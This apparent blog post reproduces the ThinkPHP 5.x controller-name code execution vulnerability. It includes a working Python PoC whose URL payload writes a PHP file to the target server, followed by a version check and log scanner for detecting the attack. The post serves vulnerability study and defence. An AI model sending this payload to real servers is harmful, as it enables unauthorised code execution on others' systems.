layout: post
cid: 69
title: Reproducing the ThinkPHP arbitrary code execution vulnerability
slug: 69
date: '2018/12/12 17:02:00'
updated: '2019/01/22 10:50:52'
status: publish
author: 夜莺
categories:


Reproducing the ThinkPHP arbitrary code execution vulnerability

1. Vulnerability description

Because the ThinkPHP framework does not validate the controller name strictly enough, an attacker can execute arbitrary malicious code on the server when forced routing is not enabled.
Local reproduction confirmed that a single HTTP GET request is enough to exploit the vulnerability and execute arbitrary code. The example below executes phpinfo().

2. Affected versions

ThinkPHP 5.0.x < 5.0.23
ThinkPHP 5.1.x < 5.1.31

3. Reproduction

Build the environment with docker and start it.
Visit 192.168.1.93:8181.
Construct the PoC:

```python
#!/usr/bin/env python
#coding:utf-8
# Python 2 script (print statements), as in the original post.
import sys
import requests


def tpgetshell(url):
    # Request headers sent with the PoC request
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cache-Control": "max-age=0",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36",
    }
    r = requests.get(url=url, headers=headers)
    print "phpinfo写入成功"
    print "shell url:" + sys.argv[1] + "/phpinfo.php"


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "python http://www.xxx.com/"
    else:
        # Route override: the controller segment names a fully qualified class
        poc = "/?s=index/\\think\\template\\driver\\file/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E"
        url = sys.argv[1] + poc
        tpgetshell(url)
```
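From the defender's side, the two facts the post gives (the affected version ranges in section 2, and the shape of the malicious route in the PoC, where the controller segment is a backslash-qualified PHP class name instead of a plain `module/controller/action` triple) are enough to write a version check and a log scanner. The following is an added example, not code from the original post; the log lines are constructed (the second one reuses the PoC path from the post, the third is the same route with percent-encoded backslashes), and the `SAMPLE_LOG`, `is_affected`, `route_of`, `suspicious_route` and `scan_log` names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the original post). The first
# request is a normal ThinkPHP route; the second carries the PoC path from the
# post; the third is the same route with the backslashes URL-encoded.
SAMPLE_LOG = r"""
192.168.1.50 - - [12/Dec/2018:17:02:01 +0800] "GET /index.php?s=index/index/index HTTP/1.1" 200 512
192.168.1.50 - - [12/Dec/2018:17:02:07 +0800] "GET /?s=index/\think\template\driver\file/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E HTTP/1.1" 200 0
192.168.1.50 - - [12/Dec/2018:17:02:09 +0800] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E HTTP/1.1" 200 0
"""

# Matches the request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_affected(version):
    """True when a ThinkPHP version falls inside the ranges the post lists
    (5.0.x < 5.0.23, 5.1.x < 5.1.31)."""
    parts = tuple(int(p) for p in version.split("."))
    if parts[:2] == (5, 0):
        return parts < (5, 0, 23)
    if parts[:2] == (5, 1):
        return parts < (5, 1, 31)
    return False


def route_of(target):
    """Return the ThinkPHP route from a request target.

    ThinkPHP 5 takes the route from the `s` query parameter (as the PoC does)
    or from the path; both are handled. parse_qs already percent-decodes once;
    the extra unquote also catches a doubly encoded value such as %255C."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if "s" in query:
        return unquote(query["s"][0])
    return unquote(parts.path)


def suspicious_route(route):
    """A legitimate module/controller/action route never contains a backslash.
    One that does is naming a fully qualified PHP class in the controller
    segment, which is exactly the override this bug relies on."""
    if "\\" in route:
        return "backslash-qualified class name in controller segment"
    return None


def scan_log(text):
    """Parse each request line and return the entries that should be flagged."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        route = route_of(m.group("target"))
        reason = suspicious_route(route)
        if reason:
            hits.append({"target": m.group("target"), "route": route, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["reason"], "->", hit["route"])
```

Matching on the decoded route rather than on the literal `\think\` string is deliberate: the same request arrives with `%5C`, `%255C` or mixed case depending on the client, and the property that actually identifies the attack is a backslash anywhere in the controller segment, not one particular class name. The version check is the cheaper control: anything reported as affected should be upgraded to 5.0.23 / 5.1.31 or later, or run with forced routing enabled as the post's description implies.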

Test: